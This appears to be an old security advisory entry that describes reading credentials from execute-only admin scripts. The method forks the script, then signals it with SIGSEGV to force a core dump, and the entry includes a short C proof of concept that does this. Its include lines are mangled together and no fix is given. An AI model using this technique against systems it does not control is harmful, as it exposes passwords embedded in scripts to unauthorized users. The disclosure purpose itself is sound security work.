COMMAND
	Signal hooking allows to view process memory on badly configured hosts
SYSTEMS AFFECTED
	All ?
PROBLEM
	Jon Masters [[email protected]] says :
	We all know that old chestnut about tracing setuid programs or  scripts,
	but what about non-setuid scripts which have been  installed  for  users
	and given execute only permission. For example, a lot of  sites  provide
	scripts for users to run which perform some admin related  function  and
	thus have usernames or passwords  within  them  -  potentially  free  to
	users.
	The thing I want to do is make a few people think about fixing  this  by
	taking whatever steps are necessary on a per-installation basis.  It  is
	a silly kind of thing which seems to be overlooked all too often.  There
	is some trivial code attached for those who really do not see my point.
	This is bound to be covered somewhere, I just want to get viewpoints.
	
	/* Include useful header files. */
	#include <stdio.h> #include <unistd.h>  #include  <sys/types.h>
	#include <sys/wait.h> #include <stdlib.h> #include <signal.h>
	#define CHILD_ARGV_LENGTH 2 #define TRUE 1
	int main(int argc, char *argv[]) {
	  int child_pid = 0;
	  char *child_argv[CHILD_ARGV_LENGTH];
	  struct rlimit rlp;
	  if (argc != 2) {
	    printf("Usage:\n%s command\n",argv[0]);
	    exit(1);
	  }
	  child_argv[0] = argv[1];
	  printf("The entertainment starts here...\n");
	  if ((child_pid = fork()) == 0) {
	    if (getrlimit(RLIMIT_CORE, &rlp) != 0) {
	      printf("Could not get limits.\n");
	      exit(1);
	    } else {
	      printf("The current limit is: %d.\n",(int)rlp.rlim_cur);
	    }
	    printf("I am the child process and my process id is %d\n",
		   (int)getpid());
	    /* child_argv[0] = "./test_script.sh"; */
	    child_argv[1] = NULL;
	    printf("Invoking program: %s\n",child_argv[0]);
	    fflush(stdout);
	    if (execv(child_argv[0],child_argv) == -1) {
	      printf("A descriptive error message.\n");
	    }
	    /* system("/bin/ls"); */ /* An alternative which forks. */
	    printf("This point is never reached normally\n");
	  } else {
	    /* This is the horribly ugly bit where we sleep for an empirical amount of
	       time. Obviously this is not the correct way to write a general purpose
	       exploit - but that was not the point of this code. Go fix if you really
	       have no life :-) Perhaps some sem or other process sync can go here. */
	    usleep(10000);
	    while(TRUE) {
	      if (kill(child_pid,SIGSEGV) == 0) {
		printf("The package was delivered.\n");
		break;
	      }
	    }
	    waitpid(child_pid,NULL,0); /* could use wait() also. */
	  }
	  printf("Main program exits normally\n");
	  return 0; /* return something */
	}
	
SOLUTION
	?